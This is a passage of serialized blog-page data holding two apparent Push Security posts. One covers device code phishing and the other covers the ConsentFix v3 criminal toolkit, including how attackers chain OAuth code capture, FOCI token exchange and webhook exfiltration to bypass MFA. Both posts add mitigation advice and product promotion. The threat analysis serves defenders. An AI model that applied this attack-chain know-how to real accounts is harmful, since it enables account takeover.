",{"data":16097,"content":16098,"nodeType":769},{},[16099],{"data":16100,"marks":16101,"value":16103,"nodeType":699},{},[16102],{"type":707},"Device code logins are a feature, not a vulnerability, making attacks difficult to block",{"data":16105,"content":16106,"nodeType":695},{},[16107],{"data":16108,"marks":16109,"value":16110,"nodeType":699},{},[],"Device code authorization is a legitimate mechanism regularly used in enterprise environments, particularly for CLI logins. Tools like Azure CLI, GitHub CLI, and AWS CLI all use (or have used) the device code flow as a primary or fallback authentication method. This creates a dual problem for defenders. ",{"data":16112,"content":16113,"nodeType":695},{},[16114],{"data":16115,"marks":16116,"value":16117,"nodeType":699},{},[],"First, the phishing attack happens entirely on a legitimate site — there's no fake login page, no malicious payload to scan for, and the URL in the browser is genuine. Since there's no traditional phishing content being delivered, these attacks are more resistant to detection by email and network security tools.",{"data":16119,"content":16120,"nodeType":695},{},[16121],{"data":16122,"marks":16123,"value":16124,"nodeType":699},{},[],"Second, the widespread legitimate use of device code flow — particularly among developers and technical users — normalizes the experience of entering device codes. A phishing lure asking them to do the same thing is indistinguishable from a legitimate IT request. And for non-technical users, this experience isn't much different to, for example, entering a code sent via email or authenticator app. ",{"data":16126,"content":16127,"nodeType":769},{},[16128],{"data":16129,"marks":16130,"value":16132,"nodeType":699},{},[16131],{"type":707},"Multiple apps are vulnerable, with different risk profiles",{"data":16134,"content":16135,"nodeType":695},{},[16136],{"data":16137,"marks":16138,"value":16139,"nodeType":699},{},[],"Various apps implement the device code flow, each with different levels of control and default security, but the risk is not uniform across platforms. ",{"data":16141,"content":16142,"nodeType":1589},{},[16143,16158,16172],{"data":16144,"content":16145,"nodeType":1593},{},[16146],{"data":16147,"content":16148,"nodeType":695},{},[16149,16154],{"data":16150,"marks":16151,"value":16153,"nodeType":699},{},[16152],{"type":707},"Google Workspace ",{"data":16155,"marks":16156,"value":16157,"nodeType":699},{},[],"is a significantly lower-risk target because Google explicitly limits which scopes are available to the device code flow — Gmail, Calendar, and most Workspace APIs are simply unavailable through this mechanism. ",{"data":16159,"content":16160,"nodeType":1593},{},[16161],{"data":16162,"content":16163,"nodeType":695},{},[16164,16168],{"data":16165,"marks":16166,"value":13629,"nodeType":699},{},[16167],{"type":707},{"data":16169,"marks":16170,"value":16171,"nodeType":699},{},[]," offers the broadest attack surface due to unrestricted scopes, reusable first-party client IDs, and the FOCI\u002FPRT escalation paths. ",{"data":16173,"content":16174,"nodeType":1593},{},[16175],{"data":16176,"content":16177,"nodeType":695},{},[16178,16182,16187],{"data":16179,"marks":16180,"value":16181,"nodeType":699},{},[],"Apps like ",{"data":16183,"marks":16184,"value":16186,"nodeType":699},{},[16185],{"type":707},"GitHub",{"data":16188,"marks":16189,"value":16190,"nodeType":699},{},[]," sit in between — broad scopes are available (including full repository access), but the attacker must control their own OAuth app and the victim sees an explicit consent screen. ",{"data":16192,"content":16196,"nodeType":1041},{"target":16193},{"sys":16194},{"id":16195,"type":1046,"linkType":1047},"ejNSC76jge1p1zzz9wwiG",[],{"data":16198,"content":16199,"nodeType":721},{},[],{"data":16201,"content":16202,"nodeType":725},{},[16203],{"data":16204,"marks":16205,"value":16207,"nodeType":699},{},[16206],{"type":707},"Security recommendations",{"data":16209,"content":16210,"nodeType":695},{},[16211],{"data":16212,"marks":16213,"value":16214,"nodeType":699},{},[],"Security teams need to consider the risk posed by device code phishing across multiple apps where device code authorization grants are common, particularly for developers and technical users. ",{"data":16216,"content":16217,"nodeType":695},{},[16218],{"data":16219,"marks":16220,"value":16221,"nodeType":699},{},[],"In an ideal world, you would simply block device code logins. But this can’t be done without causing serious disruption in some environments, while some apps simply don’t provide the tools required to do so. For example, device code is the default CLI sign-in method for GitHub. Developer-heavy organizations are likely to encounter higher levels of legitimate use.",{"data":16223,"content":16224,"nodeType":695},{},[16225,16229,16238,16242,16247,16251,16256,16260,16265],{"data":16226,"marks":16227,"value":16228,"nodeType":699},{},[],"Microsoft arguably offers the strongest control options (other than Google, who negate it right out of the gate), though they do require a fair amount of work. ",{"data":16230,"content":16232,"nodeType":791},{"uri":16231},"https:\u002F\u002Ftechcommunity.microsoft.com\u002Fblog\u002Fmicrosoft-entra-blog\u002Fnew-microsoft-managed-policies-to-raise-your-identity-security-posture\u002F4286758",[16233],{"data":16234,"marks":16235,"value":16237,"nodeType":699},{},[16236],{"type":799},"Microsoft now explicitly recommends",{"data":16239,"marks":16240,"value":16241,"nodeType":699},{},[]," blocking device code flow for tenants that haven't used it in the past 25 days. Their guidance is to create a custom CA policy: target relevant users, set the ",{"data":16243,"marks":16244,"value":16246,"nodeType":699},{},[16245],{"type":707},"Authentication Flows",{"data":16248,"marks":16249,"value":16250,"nodeType":699},{},[]," condition to block ",{"data":16252,"marks":16253,"value":16255,"nodeType":699},{},[16254],{"type":707},"Device Code Flow",{"data":16257,"marks":16258,"value":16259,"nodeType":699},{},[],", and set the grant control to ",{"data":16261,"marks":16262,"value":16264,"nodeType":699},{},[16263],{"type":707},"Block Access",{"data":16266,"marks":16267,"value":16268,"nodeType":699},{},[],". Deploy in report-only mode first to identify any legitimate device code usage, then enforce with narrow exceptions.",{"data":16270,"content":16274,"nodeType":1041},{"target":16271},{"sys":16272},{"id":16273,"type":1046,"linkType":1047},"mQIj2o9xRzkZYKNmanB25",[],{"data":16276,"content":16277,"nodeType":695},{},[16278],{"data":16279,"marks":16280,"value":16281,"nodeType":699},{},[],"For other apps, you’re mainly limited to monitoring and response. Ensuring you’re getting authentication logs for these apps is vital, and searching for unusual access patterns (e.g. unusual login protocols, having different IPs for the authorization grant and subsequent account activity). ",{"data":16283,"content":16284,"nodeType":721},{},[],{"data":16286,"content":16287,"nodeType":725},{},[16288],{"data":16289,"marks":16290,"value":16292,"nodeType":699},{},[16291],{"type":707},"How Push Security can help",{"data":16294,"content":16295,"nodeType":695},{},[16296],{"data":16297,"marks":16298,"value":16299,"nodeType":699},{},[],"Push customers can use our browser-based capabilities to overcome the limitations of app-level controls and detect, intercept, and shut down attacks in real time. ",{"data":16301,"content":16302,"nodeType":695},{},[16303],{"data":16304,"marks":16305,"value":16306,"nodeType":699},{},[],"Our research team is already tracking multiple device code phishing campaigns and toolkits, including the EvilTokens kit. Blocking controls are already in place to prevent customers from interacting with malicious pages that match our detections for these new toolkits, ensuring that these pages can be identified and blocked in real time regardless of the infrastructure. ",{"data":16308,"content":16309,"nodeType":695},{},[16310,16314,16323],{"data":16311,"marks":16312,"value":16313,"nodeType":699},{},[],"Using Push you can also ",{"data":16315,"content":16317,"nodeType":791},{"uri":16316},"https:\u002F\u002Fpushsecurity.com\u002Fhelp\u002Fcan-i-use-push-to-help-protect-against-device-code-phishing-scenarios\u002F",[16318],{"data":16319,"marks":16320,"value":16322,"nodeType":699},{},[16321],{"type":799},"configure in-browser warnings",{"data":16324,"marks":16325,"value":16326,"nodeType":699},{},[]," whenever a user accesses a URL used for device code logins. This provides universal, last-mile protection against even ‘zero-day’ device code phishing attacks using previously unidentified toolkits.  ",{"data":16328,"content":16332,"nodeType":1041},{"target":16329},{"sys":16330},{"id":16331,"type":1046,"linkType":1047},"3JsbGaOKSS3INzBUJpoh1W",[],{"data":16334,"content":16335,"nodeType":695},{},[16336],{"data":16337,"marks":16338,"value":16339,"nodeType":699},{},[],"When a user visits those URLs, Push will also emit a webhook event that the banner was shown and acknowledged. If a user opts to proceed, you can treat this as a high-fidelity alert for your security team to investigate, providing app-agnostic telemetry that may not already be provided in your logs from that particular vendor. You can also simply use Push to block users from accessing device login pages if you’re confident that disruption won’t be caused. ",{"data":16341,"content":16342,"nodeType":769},{},[16343],{"data":16344,"marks":16345,"value":16347,"nodeType":699},{},[16346],{"type":707},"Learn more about Push",{"data":16349,"content":16350,"nodeType":695},{},[16351],{"data":16352,"marks":16353,"value":16354,"nodeType":699},{},[],"Push Security's browser-based security platform detects and blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking. You don't need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your attack surface.",{"data":16356,"content":16357,"nodeType":695},{},[16358,16362,16371,16374,16383,16387,16394],{"data":16359,"marks":16360,"value":16361,"nodeType":699},{},[],"To learn more about Push, ",{"data":16363,"content":16365,"nodeType":791},{"uri":16364},"https:\u002F\u002Fpushsecurity.com\u002Fresources\u002Fproduct-brochure",[16366],{"data":16367,"marks":16368,"value":16370,"nodeType":699},{},[16369],{"type":799},"check out our latest product overview",{"data":16372,"marks":16373,"value":2899,"nodeType":699},{},[],{"data":16375,"content":16377,"nodeType":791},{"uri":16376},"https:\u002F\u002Fpushsecurity.com\u002Fproduct-demo\u002F",[16378],{"data":16379,"marks":16380,"value":16382,"nodeType":699},{},[16381],{"type":799},"view our demo library",{"data":16384,"marks":16385,"value":16386,"nodeType":699},{},[],", or ",{"data":16388,"content":16389,"nodeType":791},{"uri":927},[16390],{"data":16391,"marks":16392,"value":1817,"nodeType":699},{},[16393],{"type":799},{"data":16395,"marks":16396,"value":1407,"nodeType":699},{},[],"Device code phishing attacks have skyrocketed: here’s what you need to know","Device code phishing is seeing a huge spike in adoption in 2026, enabling attackers to steal access tokens while bypassing standard access controls.","2026-04-04T00:00:00.000Z",{"items":16401},[16402,16404],{"sys":16403,"name":1833},{"id":1832},{"sys":16405,"name":1837},{"id":1836},{"items":16407},[16408],{"fullName":10505,"firstName":10506,"jobTitle":10507,"profilePicture":16409},{"url":10509},{"__typename":952,"sys":16411,"content":16413,"title":16974,"synopsis":16975,"hashTags":60,"publishedDate":16976,"slug":16977,"tagsCollection":16978,"authorsCollection":16984},{"id":16412},"27Z1JlNtpGTPyarh393sHK",{"json":16414},{"data":16415,"content":16416,"nodeType":691},{},[16417,16435,16442,16448,16455,16461,16481,16487,16493,16496,16504,16524,16530,16536,16542,16559,16566,16574,16581,16588,16595,16598,16606,16624,16647,16652,16658,16665,16672,16679,16682,16690,16708,16741,16748,16754,16757,16765,16772,16775,16782,16789,16797,16816,16836,16843,16849,16857,16864,16871,16874,16881,16888,16894,16911,16917,16924,16931,16938],{"data":16418,"content":16419,"nodeType":695},{},[16420,16424,16431],{"data":16421,"marks":16422,"value":16423,"nodeType":699},{},[],"In December 2025, we uncovered a state-sponsored campaign linked to Russian state-affiliated APT29 that used a new technique we called ",{"data":16425,"content":16426,"nodeType":791},{"uri":1388},[16427],{"data":16428,"marks":16429,"value":1378,"nodeType":699},{},[16430],{"type":799},{"data":16432,"marks":16433,"value":16434,"nodeType":699},{},[],". This technique merged ClickFix-style social engineering with OAuth consent phishing to hijack Microsoft accounts. Effectively, ConsentFix is a browser-native attack that results in account takeover, without the downside of needing to touch the endpoint like typical ClickFix (really, the point that it's most likely to be detected and blocked). ",{"data":16436,"content":16437,"nodeType":695},{},[16438],{"data":16439,"marks":16440,"value":16441,"nodeType":699},{},[],"The quick 101 is that victims are tricked into copy-and-pasting a legitimate Microsoft URL into the phishing page. This URL contains an OAuth authorization code that the attacker uses to sign in to a first-party Microsoft application like Azure CLI — specifically targeting apps with known Conditional Access exclusions. ",{"data":16443,"content":16447,"nodeType":1041},{"target":16444},{"sys":16445},{"id":16446,"type":1046,"linkType":1047},"7s4kF5CUFUmdkhpzuwNalX",[],{"data":16449,"content":16450,"nodeType":695},{},[16451],{"data":16452,"marks":16453,"value":16454,"nodeType":699},{},[],"At the end of the attack chain, the attacker is effectively granted API access to the victim's Entra account, while sidestepping MFA (even passkeys), device compliance checks, and in some cases conditional access controls (depending on the application ID targeted by the attacker). ",{"data":16456,"content":16460,"nodeType":1041},{"target":16457},{"sys":16458},{"id":16459,"type":1046,"linkType":1047},"IMtJXMWeaIbRsWxuQ1CaS",[],{"data":16462,"content":16463,"nodeType":695},{},[16464,16468,16477],{"data":16465,"marks":16466,"value":16467,"nodeType":699},{},[],"It didn’t take long for security researchers to jump on this new technique. Lots of contributors rallied round the security recommendations (which we covered in a ",{"data":16469,"content":16471,"nodeType":791},{"uri":16470},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fconsentfix-debrief\u002F",[16472],{"data":16473,"marks":16474,"value":16476,"nodeType":699},{},[16475],{"type":799},"follow-up blog post",{"data":16478,"marks":16479,"value":16480,"nodeType":699},{},[],") but the most notable contribution came from John Hammond, who took the attacker’s implementation and said “I can do better”. His v2 replaced a somewhat clunky implementation with a slick drag-and-drop function. But now, attackers have taken it one step further.",{"data":16482,"content":16486,"nodeType":1041},{"target":16483},{"sys":16484},{"id":16485,"type":1046,"linkType":1047},"59tfJDRhGThKD48Wjg7uY2",[],{"data":16488,"content":16492,"nodeType":1041},{"target":16489},{"sys":16490},{"id":16491,"type":1046,"linkType":1047},"6mEpyVD6f13ZttFmaBcxNm",[],{"data":16494,"content":16495,"nodeType":721},{},[],{"data":16497,"content":16498,"nodeType":725},{},[16499],{"data":16500,"marks":16501,"value":16503,"nodeType":699},{},[16502],{"type":707},"Introducing: ConsentFix v3",{"data":16505,"content":16506,"nodeType":695},{},[16507,16511,16520],{"data":16508,"marks":16509,"value":16510,"nodeType":699},{},[],"The latest development is that a member of the XSS criminal forum, a site strongly suspected to have ",{"data":16512,"content":16514,"nodeType":791},{"uri":16513},"https:\u002F\u002Fflare.io\u002Flearn\u002Fresources\u002Fblog\u002Fstate-of-the-dark-web-2026",[16515],{"data":16516,"marks":16517,"value":16519,"nodeType":699},{},[16518],{"type":799},"Russian state involvement",{"data":16521,"marks":16522,"value":16523,"nodeType":699},{},[],", has released a new tool “ConsentFix v3”, building on the v1 we saw in the wild, and John’s v2. ",{"data":16525,"content":16529,"nodeType":1041},{"target":16526},{"sys":16527},{"id":16528,"type":1046,"linkType":1047},"4AW0UnBlIaXbIFZjy8ObY1",[],{"data":16531,"content":16535,"nodeType":1041},{"target":16532},{"sys":16533},{"id":16534,"type":1046,"linkType":1047},"1b36XjqBpPx7wteBu6OA6h",[],{"data":16537,"content":16541,"nodeType":1041},{"target":16538},{"sys":16539},{"id":16540,"type":1046,"linkType":1047},"4kbiWA3b096BAFGQuozPaK",[],{"data":16543,"content":16544,"nodeType":695},{},[16545,16549,16555],{"data":16546,"marks":16547,"value":16548,"nodeType":699},{},[],"It looks like broader cybercriminals are starting to take note of ConsentFix, and with the release of public tools like this one, it could be about to go mainstream — like ",{"data":16550,"content":16551,"nodeType":791},{"uri":2818},[16552],{"data":16553,"marks":16554,"value":2570,"nodeType":699},{},[],{"data":16556,"marks":16557,"value":16558,"nodeType":699},{},[]," has this year. ",{"data":16560,"content":16561,"nodeType":695},{},[16562],{"data":16563,"marks":16564,"value":16565,"nodeType":699},{},[],"Let’s take a closer look at some of the more interesting details of the ConsentFix v3 implementation before considering the bigger picture.  ",{"data":16567,"content":16568,"nodeType":769},{},[16569],{"data":16570,"marks":16571,"value":16573,"nodeType":699},{},[16572],{"type":707},"ConsentFix v3 under the hood",{"data":16575,"content":16576,"nodeType":695},{},[16577],{"data":16578,"marks":16579,"value":16580,"nodeType":699},{},[],"The first thing that jumps out is just how detailed this forum post is. It reads like a security vendor blog post. It walks through the key technical concepts that the reader needs to know, breaking down OAuth grants, consent phishing, refresh tokens, and FOCI (or 'Family of Client IDs' — basically, the feature that allows attackers to use a refresh token obtained for one Microsoft app to be exchanged for access tokens to other FOCI apps without re-authentication). It then walks through the history of ClickFix and ConsentFix before providing step-by-step guidance for users. ",{"data":16582,"content":16583,"nodeType":695},{},[16584],{"data":16585,"marks":16586,"value":16587,"nodeType":699},{},[],"ConsentFix v3 allows users to instrument the entire attack chain, enabling users to spin up ConsentFix infrastructure, create believable personas with which to interact with victims, craft and manage email campaigns, and automate the process of exchanging the captured OAuth token for session and refresh tokens to establish access to the compromised account. ",{"data":16589,"content":16590,"nodeType":695},{},[16591],{"data":16592,"marks":16593,"value":16594,"nodeType":699},{},[],"A combination of SaaS and open-source tools are used to perform the attack, including Cloudflare Workers for hosting, ZoomInfo for target identification, Dropbox for PDF hosting, and Pipedream as an exfiltration channel (effectively creating a webhook to automatically exchange the OAuth material in the URL for a refresh token). They also use hacker tools like SpecterPortal for post exploitation activity.",{"data":16596,"content":16597,"nodeType":721},{},[],{"data":16599,"content":16600,"nodeType":725},{},[16601],{"data":16602,"marks":16603,"value":16605,"nodeType":699},{},[16604],{"type":707},"Why attackers are turning to OAuth-based attacks",{"data":16607,"content":16608,"nodeType":695},{},[16609,16613,16620],{"data":16610,"marks":16611,"value":16612,"nodeType":699},{},[],"Attackers are increasingly turning to OAuth based techniques in 2026. Not only are “legit” OAuth connections being abused in supply chain attacks, but attacks targeting OAuth mechanisms have significantly increased with the rise of ",{"data":16614,"content":16615,"nodeType":791},{"uri":2818},[16616],{"data":16617,"marks":16618,"value":2570,"nodeType":699},{},[16619],{"type":799},{"data":16621,"marks":16622,"value":16623,"nodeType":699},{},[],". This is because:",{"data":16625,"content":16626,"nodeType":1589},{},[16627,16637],{"data":16628,"content":16629,"nodeType":1593},{},[16630],{"data":16631,"content":16632,"nodeType":695},{},[16633],{"data":16634,"marks":16635,"value":16636,"nodeType":699},{},[],"OAuth attacks defeat standard access controls (including passkeys)",{"data":16638,"content":16639,"nodeType":1593},{},[16640],{"data":16641,"content":16642,"nodeType":695},{},[16643],{"data":16644,"marks":16645,"value":16646,"nodeType":699},{},[],"It’s very low friction, and less likely that users will identify it as phishing (see examples below)",{"data":16648,"content":16651,"nodeType":1041},{"target":16649},{"sys":16650},{"id":16485,"type":1046,"linkType":1047},[],{"data":16653,"content":16657,"nodeType":1041},{"target":16654},{"sys":16655},{"id":16656,"type":1046,"linkType":1047},"2WPb41lNRajdpt5pogQg8M",[],{"data":16659,"content":16660,"nodeType":695},{},[16661],{"data":16662,"marks":16663,"value":16664,"nodeType":699},{},[],"From the user’s perspective, these aren’t situations that users are trained to treat as suspicious. In one case, the victim copies a URL (or simply drag-and-drops a box on the page). In another, they enter a short passcode that’s visible on the page. ",{"data":16666,"content":16667,"nodeType":695},{},[16668],{"data":16669,"marks":16670,"value":16671,"nodeType":699},{},[],"Both are using pop-up windows that look very convincing — and point to legitimate Microsoft pages\u002FURLs. Even users scrutinizing the domain won’t see anything out of place. And as you can see, if the user is already signed into their Microsoft account in the browser, there’s no credential entry or MFA checks to pass through. Simply select your account from the drop down menu and … that’s it.",{"data":16673,"content":16674,"nodeType":695},{},[16675],{"data":16676,"marks":16677,"value":16678,"nodeType":699},{},[],"This unfamiliarity is the same reason that attacks like ClickFix have been so successful. In general, convincing social engineering — well crafted comms, legit-looking pages hosted on trusted sites — combined with unfamiliar payloads makes for a clever attack. And when these attacks play out entirely in the browser (circumventing endpoint controls) and sidestep identity controls, the impact is dialled up even further. ",{"data":16680,"content":16681,"nodeType":721},{},[],{"data":16683,"content":16684,"nodeType":725},{},[16685],{"data":16686,"marks":16687,"value":16689,"nodeType":699},{},[16688],{"type":707},"How ConsentFix and device code phishing overlap",{"data":16691,"content":16692,"nodeType":695},{},[16693,16697,16704],{"data":16694,"marks":16695,"value":16696,"nodeType":699},{},[],"It was only ever going to be a matter of time before ConsentFix was adopted by the mass market. But these things don’t always happen particularly fast. ",{"data":16698,"content":16699,"nodeType":791},{"uri":2818},[16700],{"data":16701,"marks":16702,"value":260,"nodeType":699},{},[16703],{"type":799},{"data":16705,"marks":16706,"value":16707,"nodeType":699},{},[]," is probably the best example of this — it’s been a known technique since 2021, but it took until this year to enter mainstream adoption. A big part of that has been the availability of criminal toolkits, and also the rise in AI-assisted capabilities for tool creation (clearly at play here too). The similarity with device code phishing doesn’t end there. ",{"data":16709,"content":16710,"nodeType":695},{},[16711,16715,16724,16728,16737],{"data":16712,"marks":16713,"value":16714,"nodeType":699},{},[],"Both ConsentFix and device code phishing are OAuth attacks. They both find ways of bypassing the standard login procedure (and controls) by targeting different authorization flows, but with a similar outcome and the same advantages to an attacker. Device code phishing exploits the device authorization grant (",{"data":16716,"content":16718,"nodeType":791},{"uri":16717},"https:\u002F\u002Fdatatracker.ietf.org\u002Fdoc\u002Fhtml\u002Frfc8628",[16719],{"data":16720,"marks":16721,"value":16723,"nodeType":699},{},[16722],{"type":799},"RFC 8628",{"data":16725,"marks":16726,"value":16727,"nodeType":699},{},[],"). ConsentFix exploits the authorization code grant (",{"data":16729,"content":16731,"nodeType":791},{"uri":16730},"https:\u002F\u002Fdatatracker.ietf.org\u002Fdoc\u002Fhtml\u002Frfc6749#section-4.1",[16732],{"data":16733,"marks":16734,"value":16736,"nodeType":699},{},[16735],{"type":799},"RFC 6749",{"data":16738,"marks":16739,"value":16740,"nodeType":699},{},[],") as implemented for native\u002Fdesktop apps with localhost redirects. ",{"data":16742,"content":16743,"nodeType":695},{},[16744],{"data":16745,"marks":16746,"value":16747,"nodeType":699},{},[],"The post-compromise paths are essentially identical because the tokens you get are determined by which app you target, what scopes it has, and the victim user’s permissions, not by which OAuth flow you used to obtain them. The authorization code flow and the device code flow are just different front doors into the same token issuance system.",{"data":16749,"content":16753,"nodeType":1041},{"target":16750},{"sys":16751},{"id":16752,"type":1046,"linkType":1047},"7np3j139dWMP7sLlUQwEFC",[],{"data":16755,"content":16756,"nodeType":721},{},[],{"data":16758,"content":16759,"nodeType":725},{},[16760],{"data":16761,"marks":16762,"value":16764,"nodeType":699},{},[16763],{"type":707},"The verdict: An interesting sign of what’s coming, but maybe not the final form",{"data":16766,"content":16767,"nodeType":695},{},[16768],{"data":16769,"marks":16770,"value":16771,"nodeType":699},{},[],"It’s clear that ConsentFix v3 isn’t exactly an industrialized PhaaS-scale offering. It’s probably closer to a red team-esque proof of concept. But it is a good example of how attackers could operationalize ConsentFix campaigns using largely off-the-shelf tooling and legit SaaS tools. And an indicator of what might be coming soon. ",{"data":16773,"content":16774,"nodeType":721},{},[],{"data":16776,"content":16777,"nodeType":725},{},[16778],{"data":16779,"marks":16780,"value":16207,"nodeType":699},{},[16781],{"type":707},{"data":16783,"content":16784,"nodeType":695},{},[16785],{"data":16786,"marks":16787,"value":16788,"nodeType":699},{},[],"To be able to tackle modern attacks like ConsentFix that occur entirely within the browser context, it is vital that organizations look to monitor the browser as a detection surface, hunt for signs of malicious activity, and block attacks in real-time — in the same way that you would expect EDR to work for endpoint attacks. We’ll talk about how we do this below, but first here’s some general recommendations. ",{"data":16790,"content":16791,"nodeType":769},{},[16792],{"data":16793,"marks":16794,"value":16796,"nodeType":699},{},[16795],{"type":707},"Microsoft ecosystem",{"data":16798,"content":16799,"nodeType":695},{},[16800,16804,16812],{"data":16801,"marks":16802,"value":16803,"nodeType":699},{},[],"Despite the similarity with device code phishing, the ",{"data":16805,"content":16806,"nodeType":791},{"uri":16231},[16807],{"data":16808,"marks":16809,"value":16811,"nodeType":699},{},[16810],{"type":799},"primary recommendation from Microsoft for device code attacks",{"data":16813,"marks":16814,"value":16815,"nodeType":699},{},[]," — disable the device code flow via conditional access — doesn’t apply to ConsentFix (because, as mentioned, it uses a different login flow).",{"data":16817,"content":16818,"nodeType":695},{},[16819,16823,16832],{"data":16820,"marks":16821,"value":16822,"nodeType":699},{},[],"For both ConsentFix and device code phishing, the ",{"data":16824,"content":16826,"nodeType":791},{"uri":16825},"https:\u002F\u002Fmsendpointmgr.com\u002F2026\u002F01\u002F08\u002Fconsentfix-quickfix\u002F",[16827],{"data":16828,"marks":16829,"value":16831,"nodeType":699},{},[16830],{"type":799},"strongest recommendation",{"data":16833,"marks":16834,"value":16835,"nodeType":699},{},[]," is to create Service Principals for each of the vulnerable apps and restrict the users that are authorized to access them to reduce the attack surface of users that can be phished with this method.",{"data":16837,"content":16838,"nodeType":695},{},[16839],{"data":16840,"marks":16841,"value":16842,"nodeType":699},{},[],"You should also hunt in logs for relevant application IDs and resource IDs, and look for mismatches in terms of the initial access IP and subsequent activity, because while the initial login is performed by the user, subsequent actions will be performed by the attacker.  ",{"data":16844,"content":16848,"nodeType":1041},{"target":16845},{"sys":16846},{"id":16847,"type":1046,"linkType":1047},"49Y7NXpnAeAYe9fCp1oyKn",[],{"data":16850,"content":16851,"nodeType":769},{},[16852],{"data":16853,"marks":16854,"value":16856,"nodeType":699},{},[16855],{"type":707},"Beyond Microsoft — Google, GitHub, Salesforce, AWS",{"data":16858,"content":16859,"nodeType":695},{},[16860],{"data":16861,"marks":16862,"value":16863,"nodeType":699},{},[],"It’s worth calling out that these recommendations are Microsoft specific. While in-the-wild exploitation has focused on Microsoft, GitHub, Salesforce, AWS and others are also impacted by device code phishing, supporting device code flow either as a primary or fallback mechanism (Google less so due to inherent restrictions on scopes authorized in the context of device code logins). ",{"data":16865,"content":16866,"nodeType":695},{},[16867],{"data":16868,"marks":16869,"value":16870,"nodeType":699},{},[],"Similarly, ConsentFix principles can be applied beyond Microsoft too. The core requirement is that an OAuth code ends up in a location the victim can manually see and share, e.g. a localhost redirect where no listener is present to complete the handshake. Google Cloud CLI, GitHub CLI, and others support the auth code grant and allow localhost as a redirect URI. ",{"data":16872,"content":16873,"nodeType":721},{},[],{"data":16875,"content":16876,"nodeType":725},{},[16877],{"data":16878,"marks":16879,"value":4627,"nodeType":699},{},[16880],{"type":707},{"data":16882,"content":16883,"nodeType":695},{},[16884],{"data":16885,"marks":16886,"value":16887,"nodeType":699},{},[],"We’re already detecting and blocking both ConsentFix and device code phishing attacks as they target users in their web browser. When a page matches our detections for a device code or ConsentFix phishing kit (not limited to things like known-bad IPs and domains, but DOM-level analysis of the web page) Push detects and blocks it. Unlike an SWG or RBI type solution, Push analyzes every web page in every browser session and tab, in real time, with no latency. ",{"data":16889,"content":16893,"nodeType":1041},{"target":16890},{"sys":16891},{"id":16892,"type":1046,"linkType":1047},"63EwHbmFZVAlhoXl17Xjfi",[],{"data":16895,"content":16896,"nodeType":695},{},[16897,16900,16907],{"data":16898,"marks":16899,"value":16313,"nodeType":699},{},[],{"data":16901,"content":16902,"nodeType":791},{"uri":16316},[16903],{"data":16904,"marks":16905,"value":16322,"nodeType":699},{},[16906],{"type":799},{"data":16908,"marks":16909,"value":16910,"nodeType":699},{},[]," whenever a user accesses a URL used for device code logins, across any app that supports them. This provides universal, last-mile protection against even ‘zero-day’ device code phishing attacks using previously unidentified toolkits.  ",{"data":16912,"content":16916,"nodeType":1041},{"target":16913},{"sys":16914},{"id":16915,"type":1046,"linkType":1047},"3baS2yqvJd2e4aczw73PTF",[],{"data":16918,"content":16919,"nodeType":695},{},[16920],{"data":16921,"marks":16922,"value":16923,"nodeType":699},{},[],"When a user visits those URLs, Push will also emit a webhook event that the banner was shown and acknowledged. If a user opts to proceed, you can treat this as a high-fidelity alert for your security team to investigate, providing app-agnostic telemetry that may not already be provided in your logs from that particular vendor. You can also simply use Push to block users from accessing these pages if you’re confident that disruption won’t be caused. ",{"data":16925,"content":16926,"nodeType":769},{},[16927],{"data":16928,"marks":16929,"value":16347,"nodeType":699},{},[16930],{"type":707},{"data":16932,"content":16933,"nodeType":695},{},[16934],{"data":16935,"marks":16936,"value":16937,"nodeType":699},{},[],"Push Security's browser-based security platform detects and blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, device code phishing, ClickFix, and session hijacking. You don't need to wait until it all goes wrong either — you can use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more to harden your attack surface.",{"data":16939,"content":16940,"nodeType":695},{},[16941,16944,16951,16954,16961,16964,16971],{"data":16942,"marks":16943,"value":16361,"nodeType":699},{},[],{"data":16945,"content":16946,"nodeType":791},{"uri":16364},[16947],{"data":16948,"marks":16949,"value":16370,"nodeType":699},{},[16950],{"type":799},{"data":16952,"marks":16953,"value":2899,"nodeType":699},{},[],{"data":16955,"content":16956,"nodeType":791},{"uri":16376},[16957],{"data":16958,"marks":16959,"value":16382,"nodeType":699},{},[16960],{"type":799},{"data":16962,"marks":16963,"value":16386,"nodeType":699},{},[],{"data":16965,"content":16966,"nodeType":791},{"uri":927},[16967],{"data":16968,"marks":16969,"value":1817,"nodeType":699},{},[16970],{"type":799},{"data":16972,"marks":16973,"value":1407,"nodeType":699},{},[],"ConsentFix v3: Analyzing a new criminal toolkit","Investigating a new criminal toolkit for ConsentFix being promoted on criminal forums. ","2026-04-23T00:00:00.000Z","consentfix-v3-analyzing-a-new-toolkit",{"items":16979},[16980,16982],{"sys":16981,"name":1833},{"id":1832},{"sys":16983,"name":1837},{"id":1836},{"items":16985},[16986],{"fullName":1841,"firstName":1842,"jobTitle":1843,"profilePicture":16987},{"url":1845},"blog\u002Fauthorization-phishing",{"json":16990},{"data":16991,"content":16992,"nodeType":691},{},[16993],{"data":16994,"content":16995,"nodeType":695},{},[16996],{"data":16997,"marks":16998,"value":16999,"nodeType":699},{},[],"Why attackers are pivoting to authorization-layer attacks to get around authentication controls that are resistant to traditional phishing and account takeover techniques. ",{"id":9859,"publishedAt":17001},"2026-08-24T14:23:40.262Z",{"items":17003},[17004,17006],{"sys":17005,"name":1833},{"id":1832},{"sys":17007,"name":1837},{"id":1836},{"items":17009},[17010,17015,17020,17022,17024,17026,17028,17030],{"sys":17011,"name":17013,"slug":17014,"tier":45},{"id":17012},"topic-identity-attacks","Identity 